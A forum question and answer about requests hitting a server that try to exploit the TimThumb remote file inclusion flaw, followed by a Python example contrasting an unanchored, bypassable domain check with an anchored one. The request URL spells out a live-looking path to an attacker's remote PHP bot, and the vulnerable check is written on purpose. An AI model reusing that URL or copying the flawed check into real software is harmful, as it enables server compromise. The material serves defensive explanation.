My server (mediaquarter.at) is currently being DDoSed by requests like this (with some minor variations): hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL “deactivated” so no one can accidentally click it)
Beware if you try to download the referenced PHP file: in the preg_replace the /e modifier is activated and the code contains multiple eval statements – clean that up before you take a look at it! Looks like pBot; you can find more information about it here: http://www.offensivecomputing.net/?q=node/1417
TimThumb is vulnerable to remote file inclusion (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) – seems to be pretty widespread in WordPress. So I would understand somebody calling hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php to exploit the vulnerability.
However, what’s the point of trying to call it via another website (mediaquarter.at), which only results in a 404 error message? Additionally my server isn’t running WordPress, but SilverStripe instead so this seems to be pretty pointless.
Is this just an error / stupid on the attacker’s side or am I overlooking some kind of attack vector here?
PS: The server is just some cheap web hosting and I can’t reach it at all, so I’m not able to verify if there are any changes on the system.
If you don’t have the timthumb.php file then you’re not vulnerable, plain and simple. This is a very exotic vulnerability that I have studied in depth because (so far) it’s one of a kind. You should read the exploits written from the attacker’s point of view.

In short, it’s caching images from “trusted” websites like youtube.com and blogger.com. However, this regular expression is poorly written and isn’t bound to the end of the string. It’s trivial to change your subdomain to fool this regex check. This is why the attacker’s domain name is blogger.com.midislandrental.com.

The reason why you are getting DDoS’ed is probably because the fetch for timthumb.php isn’t returning a 404, or the massive botnet that is spreading via timthumb.php is incorrectly fingerprinting you as being vulnerable. You could be showing up in a Google dork for bots trying to find vulnerable hosts.
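The bypass the answer describes, as an added example that is not part of the original post or of TimThumb itself. The vulnerable function is modelled on an allow-list check that searches for the trusted domain anywhere in the host name without anchoring it to the end; the hardened function is an assumed fix, not TimThumb's actual patch. The allow-list below is a constructed subset, and the attacker URL is the one from the question.

```python
import re
from urllib.parse import urlparse

# Constructed allow-list of "trusted" image hosts (assumption: TimThumb 1.x
# carried a similar list of sites it would fetch and cache images from).
ALLOWED_SITES = ["youtube.com", "blogger.com", "flickr.com"]


def is_allowed_vulnerable(src: str) -> bool:
    """Unanchored check: the trusted name only has to appear somewhere in the host.

    Modelled on the flawed regex check the answer describes; because the
    pattern is not bound to the end of the string, a host such as
    blogger.com.midislandrental.com (or evilblogger.com) passes.
    """
    host = urlparse(src).hostname or ""
    return any(re.search(re.escape(site), host) for site in ALLOWED_SITES)


def is_allowed_fixed(src: str) -> bool:
    """Anchored check: host must equal a trusted domain or be a subdomain of it.

    Assumed hardening (not TimThumb's own patch): normalise the parsed host,
    only accept http/https, and compare against the label boundary so that
    "blogger.com.midislandrental.com" and "evilblogger.com" are rejected while
    "1.bp.blogger.com" is still accepted.
    """
    parsed = urlparse(src)
    if parsed.scheme not in ("http", "https"):
        return False
    host = (parsed.hostname or "").lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)


def classify(src: str) -> dict:
    """Return both verdicts for one src value, for side-by-side comparison."""
    return {
        "src": src,
        "vulnerable_check": is_allowed_vulnerable(src),
        "fixed_check": is_allowed_fixed(src),
    }


if __name__ == "__main__":
    # The attacker's src parameter from the question, plus constructed controls.
    samples = [
        "http://blogger.com.midislandrental.com/.mods/sh.php",
        "http://1.bp.blogger.com/image.png",
        "http://evilblogger.com/image.png",
        "ftp://blogger.com/image.png",
    ]
    for s in samples:
        print(classify(s))
```

Run it and the first sample shows the gap the answer is pointing at: the unanchored check says the attacker's host is trusted, the anchored one does not, while a genuine Blogger subdomain passes both.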